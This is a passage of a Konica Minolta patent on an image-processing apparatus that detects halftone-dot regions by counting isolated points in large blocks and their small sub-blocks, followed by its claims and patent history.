unit. The effect described above can be obtained in this case as well.\n\nFurthermore, in these aspects of the present invention, it is preferred that the halftone-dot region determination unit determine that a large block is a halftone-dot region if the number of isolated points in the large block equals or exceeds a first prescribed value and the number of isolated points in each small block contained in the large block equals or exceeds a second prescribed value. Where a large block is a halftone-dot region, the isolated points are often evenly distributed. On the other hand, in the case of character regions, it is extremely rare for the isolated points to be evenly distributed. In other words, the halftone-dot region determination unit appropriately extracts halftone-dot regions based on such characteristics. 
Incidentally, the second prescribed value is smaller than the first prescribed value.\n\nThe image processing method of a third aspect of the present invention is an image processing method that handles image data and includes the following steps: (1) dividing image data into large blocks of a prescribed size and further subdividing these large blocks into multiple smaller blocks; (2) calculating the number of isolated points contained in the large block established via division and the number of isolated points contained in the small blocks established via division; and (3) determining whether or not the large block is a halftone-dot region based on the calculated number of large block isolated points and the calculated number of small block isolated points.\n\nThe image processing method of a fourth aspect of the present invention is an image processing method that handles image data and includes the following steps: (1) dividing image data into multiple small blocks; (2) calculating the number of isolated points contained in each small block established via division; (3) calculating the number of isolated points contained in a large block composed of multiple smaller blocks based on the calculated number of small block isolated points; and (4) determining whether or not the large block is a halftone-dot region based on the calculated number of large block isolated points and the calculated number of small block isolated points.\n\nThese and other objects, advantages and features of the invention will become apparent from the following description thereof taken in conjunction with the accompanying drawings which illustrate specific embodiments of the invention.\n\nBRIEF DESCRIPTION OF THE DRAWINGS\n\nFIG. 1 is a block diagram showing the functions of an image processing apparatus of an embodiment of the present invention;\n\nFIG. 2 is a block diagram showing the functions of a halftone-dot determination unit;\n\nFIG. 3 is a conceptual drawing showing a large block and small blocks in a halftone-dot region;\n\nFIG. 4 is a conceptual drawing showing a large block and small blocks in a character region;\n\nFIG. 5 is a flow chart of the operations executed by the halftone-dot determination unit;\n\nFIG. 6 is a flow chart of the isolated point counting operation;\n\nFIG. 7 is a drawing showing the isolated points in a halftone-dot region according to the conventional art; and\n\nFIG. 8 is a drawing showing the isolated points in a character region according to the conventional art.\n\nIn the following description, like parts are designated by like reference numbers throughout the several drawings.\n\nDESCRIPTION OF THE PREFERRED EMBODIMENTS\n\nA specific embodiment of the image processing apparatus pertaining to the present invention will be explained below with reference to the drawings. This embodiment takes the form of an image forming apparatus. The image processing apparatus of this embodiment has a color conversion unit 1, a region determination unit 2, an edge reproduction unit 5 and an image forming engine 6, as shown in FIG. 1. The region determination unit 2 has a character determination unit 3 and a halftone-dot determination unit 4. The color conversion unit 1, character determination unit 3 and halftone-dot determination unit 4 receive input of image data.\n\nThe various constituent components shown in FIG. 1 will now be described. The color conversion unit 1 converts input image data from RGB input system signals to CMYK output system signals, for example. 
At the same time, the region determination unit 2 determines the attributes of the regions comprising the input image data. The character determination unit 3 of the region determination unit 2 determines the existence of character regions (regions containing fine lines) in the input image data and generates a signal for each pixel indicating whether or not the pixel is a character region. Similarly, the halftone-dot determination unit 4 of the region determination unit 2 determines the existence of halftone-dot regions and generates signals indicating whether or not each pixel is a halftone-dot region. The edge reproduction unit 5 carries out correction processing such as edge enhancement and smoothing to the image data output by the color conversion unit 1 in accordance with the signals output from the region determination unit 2. The image forming engine 6 forms images on a medium such as paper based on the image data output by the edge reproduction unit 5. The image forming engine 6 may use any method to form images based on image data, including the electrophotographic method that employs a photosensitive body and toner or the inkjet method.\n\nThe halftone-dot determination unit 4 will now be described. As shown in FIG. 2, the halftone-dot determination unit 4 includes a dividing unit 40, isolated point counters 41, 42, 43, 44 and 45, an adder 46, a comparator 47, an OR circuit 48 and an AND circuit 49. The dividing unit 40 divides the image area into blocks (hereinafter termed ‘large blocks’) having a size of M×N pixels, and further divides these large blocks into smaller blocks (hereinafter termed ‘small blocks’) having a size of (i)×(j) pixels. The isolated point counters each count the number of isolated points in a small block. The adder 46 adds up the total number of isolated points counted by the isolated point counters 41-45 and deems this number the number of isolated points in a large block. The comparator 47 compares the number of large block isolated points with a threshold value. The image processing apparatus of this embodiment divides the large block into five small blocks {circle around (1)} through {circle around (5)}, and includes the isolated point counters 41-45 that correspond to these small blocks. The sizes of the small and large blocks may be set appropriately in accordance with the type of halftone-dot region to be detected. For example, the small blocks may be set at 5×5 pixels and the large blocks set at 5×25 pixels.\n\nThe operation of the halftone-dot determination unit 4 will now be described. First, the image data is sent to the dividing unit 40. The sent image data is divided into large blocks by the dividing unit 40. The large blocks are then further divided into five small blocks. In other words, each large block is divided into five contiguous small blocks {circle around (1)} through {circle around (5)} by being divided into five sections as shown in FIG. 3. The image data for each small block is sent to the isolated point counter 41-45 corresponding to that small block.\n\nThe number of isolated points is counted for each region by the respective isolated point counters 41-45 and the number of isolated points is obtained for each region. For example, for the image data shown in FIG. 3, the number of isolated points in the small block {circle around (1)} is counted by the isolated point counter 41. Because three isolated points exist in the small block {circle around (1)}, the number of isolated points in the small block {circle around (1)} is ‘3’. 
The number of small block isolated points obtained by the five isolated point counters is then sent to the adder 46 and the OR circuit 48.\n\nThe total number of isolated points in the small blocks {circle around (1)} through {circle around (5)} is then calculated by the adder 46, and the number of isolated points in the large block is thereby obtained. For example, for the image data shown in FIG. 3, the two or three isolated points present in each of the small blocks are counted by the corresponding isolated point counter, and the total of twelve is obtained as the number of isolated points in the large block. This number of large block isolated points is then sent to the comparator 47.\n\nThe comparator 47 compares the number of large block isolated points that it has received with a prescribed threshold value. If the number of large block isolated points exceeds the threshold value, the comparator 47 sends an ‘H’ signal to the AND circuit 49, while if the number of large block isolated points is less than the threshold value, the comparator 47 sends an ‘L’ signal to the AND circuit 49.\n\nIf the output value from all of the isolated point counters 41-45 is ‘0’, the OR circuit 48 outputs an ‘L’ signal to the AND circuit 49, while if any other value is obtained, OR circuit 48 outputs an ‘H’ signal to the AND circuit 49. In other words, where the input number of isolated points is expressed as a binary number, if any ‘1’ component is contained in the binary number, ‘H’ is output. Therefore, if no isolated points exist in the small block, ‘L’ is output, while if even one isolated point is counted, ‘H’ is out put. In addition, the OR circuit 48 performs calculation for each isolated point counter (small block) and sends the result to the AND circuit 49.\n\nNext, a halftone-dot region signal is output by the AND circuit 49 based on the output result from the OR circuit 48 and the output result from the comparator 47. Specifically, where the output value from the comparator 47 is ‘H’ and all values output from the OR circuit 48 are ‘H’, a halftone-dot region signal indicating that the region constituting this large block is a halftone-dot region is output. Here, in the case of a halftone-dot region, there is a high probability that the isolated points in an area of at least a certain size will be distributed evenly within that area, as shown in the image of FIG. 3. On the other hand, in the case of a character region, it is extremely unlikely that the isolated points in an area of at least a certain size will be distributed evenly within that area, and even in an area having contiguous characters, such an even distribution over a large area is highly unlikely, as shown in the image of FIG. 4. In other words, the halftone-dot determination unit 4 extracts halftone-dot regions based on these region characteristics.\n\nA specific example will be described based on the image data shown in FIG. 3 (halftone-dot region) and FIG. 4 (character region). Here, the threshold value to which the number of large block isolated points is compared (used by the comparator 47 in FIG. 2) is a number smaller than 12. First, in the image data shown in FIG. 3, there are 12 isolated points in the large block, and ‘H’ is output by the comparator 47. Furthermore, two or three isolated points are present in each small block, and the values output from the OR circuit 48 are all ‘H’. 
Therefore, a halftone-dot region signal indicating that the region constituting this large block is a halftone-dot region is output by the AND circuit 49. Similarly, in the image data shown in FIG. 4, there are 12 isolated points in the large block, and ‘H’ is output by the comparator 47. However, two of the small blocks (the small blocks {circle around (1)} and {circle around (5)} in FIG. 4) contain no isolated points. Therefore, the values output by the OR circuit 48 include ‘L’. Accordingly, regardless of the output result from the comparator 47, the AND circuit 49 outputs a halftone-dot region signal indicating that the area constituting the large block is not a halftone-dot region.\n\nThe processing executed by the halftone-dot determination unit 4 will now be described using the flow chart shown in FIG. 5. First, the total number of isolated points in the large block (hereinafter termed the ‘total isolated points’) is initialized (S1). In this initialization, processing to divide the image data into large blocks and small blocks is carried out. The number of isolated points in any particular small block is then sought (S2). It is then determined whether or not the number of isolated points obtained in step S2 was ‘0’ (S3). If the number of isolated points was ‘0’ (YES in S3) it is determined that the large block is not a halftone-dot region (S7), and the routine ends. If the number of isolated points was not ‘0’, on the other hand (NO in S3), the counted number of small block isolated points is added to the total isolated points (S4). It is then determined whether or not there are any other small blocks for which the number of isolated points has not yet been sought (S5). If other such small blocks exist (YES in S5), the operations beginning with step S2 are repeated regarding these small blocks. If no other small blocks exist, on the other hand (NO in S5), it is determined whether or not the total isolated points exceeds a threshold value (S6). If the total isolated points is larger than the threshold value (YES in S6), it is determined that the large block is a halftone-dot region (S8) and the routine ends. If the threshold value is larger than the total isolated points, however (NO in S6), it is determined that the large block is not a halftone-dot region (S7) and the routine ends.\n\nThe operation (S2) by which the number of isolated points is sought will now be described with reference to the flow chart of FIG. 6. First, the number of isolated points is initialized (S21). It is then determined whether or not the selected pixel is a pixel that displays an isolated point (hereinafter termed an ‘isolated point pixel’) (S22). If it is an isolated point pixel (YES in S22), the number of isolated points is increased by one (S23). If the selected pixel is not an isolated point pixel, on the other hand (NO in S22), or after the operation of S23 is completed, it is determined whether or not other pixels exist in that small block as to which isolated point pixel determination has not been performed (S24). If such other pixels exist (YES in S5), the operations beginning with step S22 are repeated for such pixels. 
If no other such pixels exist, however (NO in S5), the routine ends.\n\nBecause various methods are known in the art for determining the existence of isolated point pixels (S22), details thereof will be omitted here, but it is acceptable if, for example, using a filter of 3×3 pixels centered on the focus pixel, it is determined that the focus pixel is an isolated point pixel where the focus pixel is a black pixel and all of the pixels surrounding the focus pixel are white pixels. Furthermore, although in this example black isolated points are sought, the accuracy of halftone-dot determination is improved by seeking white isolated points as well. In determining the existence of white isolated points, it is acceptable if, for example, using a filter of 3×3 pixels centered on the focus pixel, it is determined that the focus pixel is an isolated point pixel where the focus pixel is a white pixel and all of the pixels surrounding the focus pixel are black pixels.\n\nThe dividing unit 40 of this embodiment divides into small blocks the large blocks previously obtained via division, but it may instead first divide the entire image data into small blocks and then aggregate the small blocks into large blocks. In this case, after the image data is divided into small blocks, areas of a certain size formed by contiguous small blocks are deemed large blocks.\n\nThe edge reproduction unit 5 performs smoothing based on halftone-dot region signals. The areas to which smoothing is performed are halftone-dot regions, and smoothing is not performed to other areas, i.e., character regions. The image forming engine 6 forms images based on the image data that underwent smoothing by the edge reproduction unit 5.\n\nAs described in detail above, in this embodiment, the image data input by the dividing unit 40 is divided into large blocks and small blocks. The number of isolated points in each of the various small blocks is then calculated by the isolated point counters 41-45. The adder 46 calculates the number of large block isolated points by adding together the number of isolated points counted by each of the isolated point counters. The comparator 47 compares the number of large block isolated points with a threshold value. The number of isolated points obtained by each isolated point counter is sent to the AND circuit 49 via the OR circuit 48. In other words, data indicating whether or not isolated points exist in each small block is sent. The AND circuit 49 determines that the large block is a halftone-dot region only where the large block isolated point total exceeds a threshold value and isolated points exist in each of the small blocks comprising the large block, and this result is output as a halftone-dot region signal. This is because the probability that the large block is not a halftone-dot region is high where the large block includes at least one small block that contains no isolated points. As a result, erroneous region determination can be minimized. Therefore, an image processing apparatus offering minimal deterioration in output image quality can be realized by appropriately determining the attributes of each area within the image data and carrying out appropriate processing for each area.\n\nThis embodiment constitutes a mere example of the present invention, which is not limited in any way thereby. Therefore the present invention may naturally be modified or improved in various ways within the essential scope of the invention. 
For example, the image forming destination for the image processing apparatus is not limited to paper, and such image forming may be carried out on a display device such as a personal computer.\n\nIn this embodiment, the large blocks were formed with a horizontal orientation as shown in the drawings, but the present invention is not limited to this implementation. In other words, the large blocks may be oriented both horizontally and vertically. However, where the large blocks are oriented both horizontally and vertically, the burden on the memory and the processing system increases, and therefore it is preferred that they be divided in one direction only.\n\nIn this embodiment, the number of isolated point(s) for each of the small blocks was sent to the OR circuit 48, but the present invention is not limited to this implementation. In other words, it is not necessary that the small blocks for which the isolated point totals are sent consist of all small blocks or even contiguous small blocks. It is acceptable if areas that are away from each other in a large block are extracted for final halftone-dot determination. For example, it is acceptable if the small blocks {circle around (1)}, {circle around (3)} and {circle around (5)} are extracted from the image data shown in FIG. 3 and the number of isolated points for only these small blocks is sent to the OR circuit 48.\n\nIn this embodiment, the isolated point totals counted by the isolated point counters are sent to the AND circuit 49 via all of the OR circuits 48, but the present invention is not limited to this implementation. In other words, it is acceptable if a single ‘H’ signal is output when isolated points exist in all of the small blocks, while an ‘L’ signal is output when any small block does not contain any isolated points, and the AND circuit 49 outputs a halftone-dot region signal based on the signal output from the OR circuit 48 and the signal output from the comparator 47.\n\nAs is clear from the above description, according to the present invention, by appropriately determining the attributes of areas of the image data and executing appropriate processing with respect to such areas, an image processing apparatus offering minimal deterioration in output image quality can be provided.\n\nAlthough the present invention has been fully described by way of examples with reference to the accompanying drawings, it is to be noted that various changes and modifications will be apparent to those skilled in the art. Therefore, unless such changes and modifications otherwise depart from the scope of the present invention, they should be construed as being included herein.\n\n## Claims\n\n1. 
An image processing apparatus that handles image data, comprising:\n\na dividing unit for dividing image data into large blocks of a prescribed size and further subdividing the large blocks into multiple smaller blocks;\na large block isolated point calculation unit for calculating a first number of isolated points contained in each large block established by said dividing unit;\na small block isolated point calculation unit for calculating a respective second number of isolated points contained in each small block established by said dividing unit; and\na halftone-dot region determination unit for determining that a specified large block among the large blocks established by the dividing unit is a halftone-dot region if all small blocks in the specified large block have an isolated point contained therein, based on the respective second numbers calculated by the small block isolated point calculation unit, and if the first number of isolated points calculated to be contained in the specified large block by the large block isolated point calculation unit is greater than or equal to a first prescribed value.\n\n2. An image processing apparatus as claimed in claim 1,\n\nwherein said halftone-dot region determination unit is operable to determine that the specified large block is a halftone-dot region if the respective second number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n3. An image processing apparatus as claimed in claim 2,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n4. An image processing apparatus as claimed in claim 1, further comprising:\n\nan image processing unit for correcting the image data based on the results of determination by said halftone-dot region determination unit.\n\n5. An image processing apparatus as claimed in claim 4, further comprising:\n\nan image forming unit for performing image formation based on the image data corrected by said image processing unit.\n\n6. An image processing apparatus that handles image data, comprising:\n\na dividing unit for dividing image data into multiple small blocks;\na small block isolated point calculation unit for calculating a respective first number of isolated points contained in each small block established by said dividing unit;\na large block isolated point calculation unit for calculating a second number of isolated points contained in a large block of the image data, the large block being composed of multiple smaller blocks based on an aggregated amount of the respective first number of isolated points calculated by said small block isolated point calculation unit; and\na halftone-dot region determination unit for determining that the large block is a halftone-dot region if all small blocks in the large block have an isolated point contained therein, based on the respective first number of isolated points calculated by the small block calculation unit, and if the second number of isolated points calculated to be contained in the large block by the large block isolated point calculation unit is greater than or equal to a first prescribed value.\n\n7. An image processing apparatus as claimed in claim 6,\n\nwherein said halftone-dot region determination unit is operable to determine that the respective first number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n8. 
An image processing apparatus as claimed in claim 7,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n9. An image processing apparatus as claimed in claim 6, further comprising:\n\nan image processing unit for correcting the image data based on the results of determination by said halftone-dot region determination unit.\n\n10. An image processing apparatus as claimed in claim 9, further comprising:\n\nan image forming unit for performing image formation based on the image data corrected by said image processing unit.\n\n11. An image processing method that handles image data, said method comprising the steps of:\n\ndividing, in processing circuitry of an image processing apparatus, image data into large blocks of a prescribed size and further subdividing the large blocks into multiple smaller blocks;\ncalculating, in the processing circuitry of the image processing apparatus, a first respective number of isolated points contained in each large block established via division and a respective second number of isolated points contained in each small block established via division; and\ndetermining, in the processing circuitry of the image processing apparatus, that a specified large block among the large blocks established via division is a halftone-dot region if all small blocks in the specified large block have an isolated point contained therein, based on the calculated respective second numbers of each small block contained in the specified large block, and if the first number of isolated points calculated to be contained in the specified large block is greater than or equal to a first prescribed value.\n\n12. An image processing method as claimed in claim 11,\n\nwherein said determining step comprises determining that the specified large block is a halftone-dot region if the respective second number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n13. An image processing method as claimed in claim 12,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n14. An image processing method that handles image data, said method comprising the steps of:\n\ndividing, in processing circuitry of the image processing apparatus, image data into multiple small blocks;\ncalculating, in the processing circuitry of the image processing apparatus, a respective first number of isolated points contained in each small block established via division;\ncalculating, in the processing circuitry of the image processing apparatus, a respective second number of isolated points contained in a large block of the image data, the large block being composed of multiple smaller blocks based on the calculated number of small block isolated points; and\ndetermining, in the processing circuitry of the image processing apparatus, that the large block is a halftone-dot region if all small blocks in the large block have an isolated point contained therein, based on the calculated respective first number of isolated points in the small blocks contained in the large block, and if calculated second number of isolated points contained in the large block is greater than or equal to a first prescribed value.\n\n15. 
An image processing method as claimed in claim 14,\n\nwherein said determining step comprises determining that the large block is a halftone-dot region if the respective first number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n16. An image processing method as claimed in claim 15,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n17. An image processing apparatus as claimed in claim 5, further comprising a character determination unit for determining whether at least one character region exists in the image data, wherein:\n\nsaid image processing unit is operable to correct the image data based on the results of determination by said halftone-dot region determination unit and said character determination unit; and\nsaid image forming unit is operable to perform image formation based on the image data corrected by said image processing unit.\n\n18. An image processing apparatus as claimed in claim 1, wherein said small block isolated point calculation unit comprises a plurality of isolated point counters respectively corresponding to the multiple small blocks contained in a large block, each of said plurality of isolated point counters being operable to count the respective second number of isolated points contained in a corresponding one of the small blocks contained in the large block.\n\n19. An image processing apparatus as claimed in claim 18, wherein said halftone-dot region determination unit comprises:\n\na first determination unit for determining whether the calculated first number of isolated points in a large block equals or exceeds the first threshold value;\na second determination unit for determining whether each of said plurality of isolated point counters of said small block isolated point calculation unit have each counted at least one isolated point in the corresponding small block contained in the large block; and\na third determination unit for determining whether the large block is a halftone-dot region based on the determination results of said first determination unit and second determination unit.\n\n20. An image processing apparatus as claimed in claim 19, wherein said third determination unit is operable to determine that the large block is a halftone-dot region if said first determination unit determines that the calculated first number of isolated points in the large blocks equals or exceeds the first threshold value, and said second determination unit determines that each of said isolated point counters have counted at least one isolated point in the corresponding small block contained in the large block.\n\n21. An image processing apparatus as claimed in claim 6, wherein the second number of isolated points contained in the large block equals an aggregate of the respective first number of isolated points that said small block isolated point calculation unit calculates for each small block composing the large block.\n\n22. An image processing apparatus as claimed in claim 6, wherein said large block isolated point calculation unit is operable to calculate the second number of isolated points contained in the large block by calculating an aggregate of the respective first number of isolated points contained in a plurality of contiguous small blocks within a predetermined area of the image data.\n\n23. 
An image processing apparatus as claimed in claim 9, further comprising a character determination unit for determining whether at least one character region exists in the image data, wherein:\n\nsaid image processing unit is operable to correct the image data based on the results of determination by said halftone-dot region determination unit and said character determination unit; and\nsaid image forming unit is operable to perform image formation based on the image data corrected by said image processing unit.\n\n24. An image processing method as claimed in claim 11, further comprising the steps of:\n\ncorrecting the image data based on the results of determination of said determining step; and\nforming images based on the corrected image data.\n\n25. An image processing method as claimed in claim 14, further comprising the steps of:\n\ncorrecting the image data based on the results of determination of said determining step; and\nforming images based on the corrected image data.\nPatent History\nPatent number: 8988732\nType: Grant\nFiled: Sep 16, 2003\nDate of Patent: Mar 24, 2015\nPatent Publication Number: 20040125409\nAssignee: Konica Minolta Business Technologies, Inc. (Chiyoda-Ku, Tokyo)\nInventors: Tomohiro Yamaguchi (Shinshiro), Yoshihiko Hirota (Toyokawa)\nPrimary Examiner: Quang N Vo\nApplication Number: 10/662,443\nClassifications" ]
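To make the determination logic above concrete, here is an illustrative sketch in Python of the test that the adder 46, comparator 47, OR circuits 48 and AND circuit 49 implement in hardware. It is a readable paraphrase, not the claimed apparatus, and the threshold of 8 is a hypothetical placeholder (the patent only requires a "first prescribed value" below the halftone count of 12).

```python
def is_black_isolated_point(window):
    """window: 3x3 neighborhood of 0/1 pixels (1 = black) centered on the focus pixel."""
    neighbours = [window[r][c] for r in range(3) for c in range(3) if (r, c) != (1, 1)]
    return window[1][1] == 1 and all(v == 0 for v in neighbours)

def is_halftone_region(small_block_counts, large_block_threshold=8):
    """Decide whether one large block is a halftone-dot region.

    small_block_counts -- isolated-point count of each small block in the large block.
    """
    total = sum(small_block_counts)                                  # adder 46
    every_small_block_hit = all(c > 0 for c in small_block_counts)   # OR circuits 48
    # AND circuit 49: both the large-block total (compared by comparator 47) and
    # the per-small-block condition must hold; otherwise treat the block as text.
    return total >= large_block_threshold and every_small_block_hit

# FIG. 3-style block (12 evenly spread dots) vs. FIG. 4-style block
# (12 dots but two empty small blocks): same total, different verdict.
print(is_halftone_region([3, 2, 3, 2, 2]))  # True  -> smooth as halftone dots
print(is_halftone_region([0, 4, 4, 4, 0]))  # False -> preserve character sharpness
```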
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9268999,"math_prob":0.96939087,"size":30870,"snap":"2020-10-2020-16","text_gpt3_token_len":5930,"char_repetition_ratio":0.24791032,"word_repetition_ratio":0.43365696,"special_character_ratio":0.19248462,"punctuation_ratio":0.0732342,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9681591,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-03T09:13:45Z\",\"WARC-Record-ID\":\"<urn:uuid:22917240-fcec-4273-bac1-3d9609b59e2f>\",\"Content-Length\":\"93617\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c502ee4c-461d-4a78-804a-c52428328337>\",\"WARC-Concurrent-To\":\"<urn:uuid:75639c79-23c5-4ff6-9ef9-01c81d2bc748>\",\"WARC-IP-Address\":\"52.200.236.247\",\"WARC-Target-URI\":\"https://patents.justia.com/patent/8988732\",\"WARC-Payload-Digest\":\"sha1:DHVYNPTWUZVS47WXFXEPAUEGKXKBJTH4\",\"WARC-Block-Digest\":\"sha1:VPUPK4554ZQ2WSJYH64OVPK3TLYKKZ2A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370510352.43_warc_CC-MAIN-20200403061648-20200403091648-00259.warc.gz\"}"}
https://www.investopedia.com/terms/f/forwardprice.asp
[ "# Forward Price: Definition, Formulas for Calculation, and Example\n\n## What Is a Forward Price?\n\nForward price is the predetermined delivery price for an underlying commodity, currency, or financial asset as decided by the buyer and the seller of the forward contract, to be paid at a predetermined date in the future. At the inception of a forward contract, the forward price makes the value of the contract zero, but changes in the price of the underlying will cause the forward to take on a positive or negative value.\n\nThe forward price is determined by the following formula:\n\n \\begin{aligned} &F_0 = S_0 \\times e^{rT} \\\\ \\end{aligned}\n\n## Basics of Forward Price\n\nForward price is based on the current spot price of the underlying asset, plus any carrying costs such as interest, storage costs, foregone interest, or other costs and opportunity costs.\n\nAlthough the contract has no intrinsic value at inception, over time a contract may gain or lose value. Offsetting positions in a forward contract are equivalent to a zero-sum game. For example, if one investor takes a long position in a pork belly forward agreement and another investor takes the short position, any gains in the long position equal the losses that the second investor incurs from the short position. By initially setting the value of the contract to zero, both parties are on equal ground at the inception of the contract.\n\n### Key Takeaways\n\n• Forward price is the price at which a seller delivers an underlying asset, financial derivative, or currency to the buyer of a forward contract at a predetermined date.\n• It is roughly equal to the spot price plus associated carrying costs such as storage costs, interest rates, etc.\n\n## Forward Price Calculation Example\n\nWhen the underlying asset in the forward contract does not pay any dividends, the forward price can be calculated using the following formula:\n\n \\begin{aligned} &F = S \\times e ^ { (r \\times t) } \\\\ &\\textbf{where:} \\\\ &F = \\text{the contract's forward price} \\\\ &S = \\text{the underlying asset's current spot price} \\\\ &e = \\text{the mathematical irrational constant approximated} \\\\ &\\text{by 2.7183} \\\\ &r = \\text{the risk-free rate that applies to the life of the} \\\\ &\\text{forward contract} \\\\ &t = \\text{the delivery date in years} \\\\ \\end{aligned}\n\nFor example, assume a security is currently trading at $100 per unit. An investor wants to enter into a forward contract that expires in one year. The current annual risk-free interest rate is 6%. Using the above formula, the forward price is calculated as:\n\n \\begin{aligned} &F = \\$100 \\times e ^ { (0.06 \\times 1) } = \\$106.18 \\\\ \\end{aligned}\n\nIf there are carrying costs, they are added to the formula:\n\n \\begin{aligned} &F = S \\times e ^ { (r + q) \\times t } \\\\ \\end{aligned}\n\nHere, q is the carrying cost. 
If the underlying asset pays dividends over the life of the contract, the formula for the forward price is:\n\n \\begin{aligned} &F = ( S - D ) \\times e ^ { ( r \\times t ) } \\\\ \\end{aligned}\n\nHere, D equals the sum of each dividend's present value, given as:\n\n \\begin{aligned} D =& \\ \\text{PV}(d(1)) + \\text{PV}(d(2)) + \\cdots + \\text{PV}(d(x)) \\\\ =& \\ d(1) \\times e ^ {- ( r \\times t(1) ) } + d(2) \\times e ^ { - ( r \\times t(2) ) } + \\cdots + \\\\ \\phantom{=}& \\ d(x) \\times e ^ { - ( r \\times t(x) ) } \\\\ \\end{aligned}\n\nUsing the example above, assume that the security pays a 50-cent dividend every three months. First, the present value of each dividend is calculated as:\n\n \\begin{aligned} &\\text{PV}(d(1)) = \\$0.5 \\times e ^ { - ( 0.06 \\times \\frac { 3 }{ 12 } ) } = \\$0.493 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(2)) = \\$0.5 \\times e ^ { - ( 0.06 \\times \\frac { 6 }{ 12 } ) } = \\$0.485 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(3)) = \\$0.5 \\times e ^ { - ( 0.06 \\times \\frac { 9 }{ 12 } ) } = \\$0.478 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(4)) = \\$0.5 \\times e ^ { - ( 0.06 \\times \\frac { 12 }{ 12 } ) } = \\$0.471 \\\\ \\end{aligned}\n\nThe sum of these is $1.927. This amount is then plugged into the dividend-adjusted forward price formula:\n\n \\begin{aligned} &F = ( \\$100 - \\$1.927 ) \\times e ^ { ( 0.06 \\times 1 ) } = \\$104.14 \\\\ \\end{aligned}" ]
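As a sanity check of the worked example, here is a small sketch that reproduces the article's numbers under the same continuous-compounding formulas; the function name and structure are purely illustrative, not an Investopedia API.

```python
from math import exp

def forward_price(spot, rate, years, dividends=()):
    """Forward price with optional (amount, payment_time_in_years) dividend pairs."""
    pv_dividends = sum(d * exp(-rate * t) for d, t in dividends)  # D in the text
    return (spot - pv_dividends) * exp(rate * years)

# No dividends: $100 spot, 6% risk-free rate, one year -> 106.18
print(round(forward_price(100, 0.06, 1), 2))

# Quarterly $0.50 dividends -> 104.14, matching the dividend-adjusted example
quarterly = [(0.50, 3 / 12), (0.50, 6 / 12), (0.50, 9 / 12), (0.50, 1.0)]
print(round(forward_price(100, 0.06, 1, quarterly), 2))
```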
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88682216,"math_prob":0.9971568,"size":3095,"snap":"2022-40-2023-06","text_gpt3_token_len":793,"char_repetition_ratio":0.16240698,"word_repetition_ratio":0.008602151,"special_character_ratio":0.25880453,"punctuation_ratio":0.10785824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-02T10:29:49Z\",\"WARC-Record-ID\":\"<urn:uuid:c983bfb9-10af-4de5-af24-3e1456c0d993>\",\"Content-Length\":\"219783\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f65ca746-ed18-4c26-ba82-23918ee12829>\",\"WARC-Concurrent-To\":\"<urn:uuid:35865fb8-d6c3-4985-882c-08041739482f>\",\"WARC-IP-Address\":\"146.75.34.137\",\"WARC-Target-URI\":\"https://www.investopedia.com/terms/f/forwardprice.asp\",\"WARC-Payload-Digest\":\"sha1:TNIRVPSTMYFZH3SKWDOZQD3VTR6QQLPA\",\"WARC-Block-Digest\":\"sha1:G6S2X7WO4VGEDTLGHN4H5QYRFQVNHQ2M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500017.27_warc_CC-MAIN-20230202101933-20230202131933-00301.warc.gz\"}"}
https://link.springer.com/article/10.1007/s11698-015-0130-5?error=cookies_not_supported&code=d6e60a5e-59ae-4e54-b8a7-ee83fd0fbf08
[ "# Historical trade integration: globalization and the distance puzzle in the long twentieth century\n\n## Abstract\n\nIn times of ongoing globalization, the notion of geographic neutrality expects the impact of distance on trade to become ever more irrelevant. However, over the last three decades a wide range of studies has found an increase in the importance of distance during the second half of the twentieth century. This paper tries to reframe this discussion by characterizing the effect of distance over a broader historical point of view. To make maximal use of the available data, we use a state-space model to construct a bilateral index of historical trade integration. Our index doubles to quadruples yearly data availability before 1950, allowing us to expand the period of analysis to 1880–2011. This implies that the importance of distance as a determinant of the changing trade pattern can be analyzed for both globalization waves. In line with O’Rourke (Politics and trade: lessons from past globalisations. Technical Report, Bruegel, 2009) and Jacks et al. (J Int Econ 83(2):185–201, 2011), we find that the first wave was marked by a strong, continuing decrease in the effect of distance. Initially, the second globalization wave started out similarly, but from the 1960s onward the importance of distance starts increasing. Nevertheless, this change is dwarfed by the strong decrease preceding it.\n\nThis is a preview of subscription content, access via your institution.\n\n1. The hti index is made available at: http://www.sherppa.ugent.be/hti/hti.html.\n\n2. In addition to freight rates and distance, Jacks et al. (2011) also control for tariffs, the gold standard, empire membership, railroad infrastructure, exchange rates, common language and shared borders.\n\n3. $$\\sqrt{X_{ij} X_{ji} / \\left( X_{ii} X_{jj} \\right) }$$, with $$X_{ij}$$ the exports from $$i$$ to $$j$$ and $$X_{ii}$$ the internal trade in country $$i$$. Internal trade is usually approximated by subtracting exports from GDP, even though this can cause negative values for small open economies. Alternative solutions include using tariff data (Head and Mayer 2013).\n\n4. Since we will estimate this model using Bayesian techniques, it would be more correct to use the term highest posterior density intervals, but for readability’s sake, we will use confidence interval throughout this paper.\n\n5. We are grateful to Beatrice Dedinger ([email protected]) for providing access to the unpublised 